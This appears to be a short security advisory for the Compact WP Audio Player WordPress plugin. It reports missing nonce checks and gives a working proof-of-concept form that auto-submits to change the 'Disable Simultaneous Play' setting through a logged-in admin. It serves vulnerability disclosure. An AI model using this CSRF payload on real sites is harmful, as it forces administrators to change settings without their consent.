The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change the “Disable Simultaneous Play” setting via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=compact-wp-audio-player%2Fsc_audio_player.php" method="post" id="csrf">
<input name="sc_audio_player_settings" value="1" type="hidden">
<input name="sc_audio_disable_simultaneous_play" value="1" type="hidden">
</form>
<script>csrf.submit()</script>